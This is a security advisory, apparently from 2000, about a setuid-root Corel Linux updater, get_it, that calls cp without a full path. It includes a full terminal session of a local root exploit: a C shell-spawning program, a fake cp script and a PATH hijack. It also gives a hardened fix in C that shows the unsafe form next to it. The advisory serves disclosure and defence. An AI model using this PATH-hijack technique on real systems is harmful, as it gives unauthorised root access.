COMMAND

    update

SYSTEMS AFFECTED

    Corel Linux

PROBLEM

    Cesar Tascon Alvarez found the following.  Corel Linux comes with a
    program called "Corel Update" to manage the ".deb" files.  This
    X-oriented program is setuid root.  The program is "get_it" and it's
    located in the /usr/X11R6/bin directory.

    If you can run it, it's easy to get root privileges on your system.
    It copies two files to the temp directory, taking no care to verify
    how.  In fact, it calls the "cp" program WITHOUT THE WHOLE PATH!!

    The only thing you have to do to hack root is to change your PATH
    so that your personal copy of the program is executed instead.
    Let's see the example:

        Script started on Wed Jan 12 01:58:17 2000
        CorelLinux:~$ id
        uid=1001(tascon) gid=1001(tascon) groups=1001(tascon)
        CorelLinux:~$ cat misu.c
        #include <stdio.h>
        #include <unistd.h>
        
        main(argc,argv)
        int argc;
        char **argv;
        {
        if (argc==2);
        setuid(atoi(argv[1]));
        execlp("/bin/bash","/bin/bash",NULL);
        }
        CorelLinux:~$ cc -o misu misu.c
        CorelLinux:~$ pwd
        /home/tascon
        CorelLinux:~$ cat cp
        echo $1 $2 $3
        /home/tascon/misu 0
        CorelLinux:~$ export PATH=.:$PATH
        CorelLinux:~$ get_it
        /usr/X11R6/share/apps/get_it/html/largebanner.html /tmp/Get_It.0.a05872
        CorelLinux:~# id
        uid=0(root) gid=1001(tascon) groups=1001(tascon)
        CorelLinux:~# exit
        exit
        /usr/X11R6/share/apps/get_it/html/smallbanner.html /tmp/Get_It.1.a05872
        CorelLinux:~# id
        uid=0(root) gid=1001(tascon) groups=1001(tascon)

SOLUTION

    Easy to patch, isn't it?
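
    A sketch of the fix, as an added example that is not Corel's code or
    part of the original report: a setuid program invokes cp by absolute
    path with a fixed environment.  The function names, CP_PATH and the
    system() form of the flaw are assumptions, since the source of get_it
    is not shown on this page.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define CP_PATH "/bin/cp"   /* assumed location of cp on the target system */

/* Assumed shape of the flaw (get_it's source is not on the page): any
 * PATH-searching call such as system(), popen() or execlp() lets the
 * caller's PATH choose which "cp" runs with the setuid privileges. */
int copy_unsafe(const char *src, const char *dst)
{
    char cmd[1024];
    snprintf(cmd, sizeof cmd, "cp %s %s", src, dst);
    return system(cmd);
}

/* Hardened form: absolute path, no shell, fixed environment.
 * Returns cp's exit status (127 if exec fails), -1 if fork/wait fails. */
int copy_safe(const char *src, const char *dst)
{
    char *const argv[] = { "cp", "--", (char *)src, (char *)dst, NULL };
    char *const envp[] = { "PATH=/bin:/usr/bin", NULL };
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(CP_PATH, argv, envp);  /* execve never consults PATH */
        _exit(127);                   /* reached only if exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s SRC DST\n", argv[0]);
        return 2;
    }
    return copy_safe(argv[1], argv[2]);
}
```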